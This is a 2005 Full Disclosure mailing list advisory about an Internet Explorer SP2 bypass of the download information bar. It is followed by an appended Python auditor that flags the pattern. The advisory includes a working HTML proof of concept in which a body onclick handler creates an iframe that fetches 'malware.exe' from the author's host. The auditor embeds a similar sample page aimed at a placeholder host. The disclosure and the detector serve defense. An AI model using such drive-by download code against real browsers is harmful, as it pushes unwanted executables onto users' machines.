Full Disclosure mailing list archives
Internet Explorer (SP2) - Remote File Download Information Bar Bypass
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Fri, 14 Jan 2005 09:53:00 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Internet Explorer
Vendors: http://www.microsoft.com
Versions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Patched With: SP2;
Platforms: Windows
Bug: Remote File Download Information Bar Bypass
Exploitation: Remote with browser
Date: 13 Jan 2005
Author: Rafel Ivgi, The-Insider
e-mail: the_insider () mail com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Internet Explorer is currently the most common internet browser in the world.
Microsoft Windows XP Service Pack 2 was designed to block any file download by
an information bar which must be clicked and selected with "Download File".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

While trying to download a file in Microsoft Internet Explorer, the user gets
the information bar. The information bar mechanism blocks/catches all
references to downloadable files, even through JavaScript and HTML event
properties. However, Microsoft's Internet Explorer (SP2) DOES NOT CATCH the
"body" tag with the HTML "onclick" event which dynamically creates "iframe"
tags. For a good, more complicated dynamic object creation I used the
"createElement" function. This way an attacker can make a user download a file
with him just clicking anywhere on the page (not on a hyperlink).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Paste into an htm/html file and add "<" at the beginning of each line:

------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
embed>
body onclick='a=document.createElement("\<iframe src=\"http:\/\/theinsider.deep-ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
center><br><br><br><br><br><br>Click AnyWhere You Want</center>
/BODY></HTML>
------------------------ cut here --------------------------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
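A defensive check for the pattern the advisory describes, added here as an example and not part of the original post: a small auditor that flags inline event-handler attributes whose script creates an iframe/object/embed element at runtime (including IE's whole-tag form of createElement), and rates the finding higher when the same handler references an executable file type. The sample pages, the attribute patterns and the example.invalid host are constructed for this example.

```python
import re
from html.parser import HTMLParser

# Inline event-handler attributes (onclick, onmouseover, ...) run as script.
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)
# Script that creates a frame/object element at runtime. IE also accepted a
# whole tag string, createElement("<iframe ...>"), so allow an optional
# backslash-escaped "<" before the element name.
DYNAMIC_EMBED = re.compile(
    r"""createElement\s*\(\s*['"]\\?<?(iframe|frame|object|embed)\b""",
    re.IGNORECASE)
# A directly executable file type referenced inside the same handler.
EXEC_URL = re.compile(r"\.(exe|scr|pif|bat|cmd|msi)\b", re.IGNORECASE)

class InlineHandlerAuditor(HTMLParser):
    """Collects (tag, attribute, severity) for suspicious inline handlers."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or not EVENT_ATTR.match(name):
                continue
            if DYNAMIC_EMBED.search(value):
                # Dynamic frame plus an .exe-style URL is the advisory's pattern.
                severity = "high" if EXEC_URL.search(value) else "medium"
                self.findings.append((tag.lower(), name.lower(), severity))

def audit_html(markup):
    """Return the findings for one HTML document (empty list if clean)."""
    auditor = InlineHandlerAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings

# Constructed sample pages; example.invalid is a placeholder host.
BENIGN_PAGE = ('<html><body><a href="#" onclick="toggleMenu(); return false;">'
               'Menu</a><iframe src="https://example.invalid/widget.html">'
               '</iframe></body></html>')
FRAME_ONLY_PAGE = ('<div onmouseover=\'var f=document.createElement("iframe");'
                   'f.src="/page.html";document.body.appendChild(f)\'>x</div>')
DOWNLOAD_PAGE = (
    r"""<html><body onclick='a=document.createElement("\<iframe """
    r"""src=\"http:\/\/example.invalid\/payload.exe\"\>\<\/iframe\>");"""
    r"""document.body.appendChild(a)'><center>Click anywhere</center></body></html>""")
if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("frame-only", FRAME_ONLY_PAGE),
                        ("download", DOWNLOAD_PAGE)):
        print(label, audit_html(page))
```

A statically written iframe is deliberately not flagged: the advisory's point is that the information bar already handles static references, and only the dynamically created one slips through.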